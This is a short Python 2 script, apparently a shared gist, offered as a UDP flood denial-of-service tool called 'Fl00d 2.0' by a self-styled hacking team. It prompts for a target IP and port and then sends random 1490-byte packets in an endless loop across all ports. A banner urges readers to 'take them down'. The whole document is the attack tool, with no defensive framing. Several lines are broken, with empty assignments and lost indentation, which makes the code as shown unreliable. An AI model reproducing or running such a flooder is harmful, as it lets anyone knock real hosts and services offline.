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Created December 9, 2017 23:23
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UDP Flood DoS Attack
#Fl00d 2.0 27-06-2017 (1:42)
#Tool for UDP Flood
#Authorized by DedSecTL
#AndroSec1337 Cyber Team
import socket, os, random, time
# Color
B = '\033[1m'
R = '\033[31m'
N = '\033[0m'
# Code time ##################
from datetime import datetime
now =
hour = now.hour
minute = now.minute
day =
month = now.month
year = now.year
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
print B+"@@@@@@@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@"
print "@@@@@@@@ @@@ @@@@@@@@@@ @@@@@@@@@@ @@@ @@@@"
print "@@! @@! @@! @@@@ @@! @@@@ @@! @@@"
print "!@! !@! !@! @!@!@ !@! @!@!@ !@! @!@"
print "@!!!:! @!! @!@ @! !@! @!@ @! !@! @!@ !@!"
print "!!!!!: !!! !@!!! !!! !@!!! !!! !@! !!!"
print "!!: !!: !!:! !!! !!:! !!! !!: !!!"
print ":!: :!: :!: !:! :!: !:! :!: !:!"
print "::: ::::::: :::::::::: :::::::::: ;:: :::"
print "::: ::::::: :::::::: :::::::: :::::::::"+N
print "["+B+""+R+"#"+N+"] "+B+""+R+"AndroSec1337 Cyber Team"+N+" Fl00d 2.0 - "+B+""+R+"DedSecTL"+N
print "#T4ke 7hem d0wn vroh - D0n7 g1ve up - Fl00d th3m"
print "#H4ck 4ll 7he 7h1ng - F1ght f0r Ju5t1c3 - K1ll th3m"
ip = raw_input('[$] T@rget 1P: ')
port = input('[$] P0rt: ')
print "Fl00d attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1
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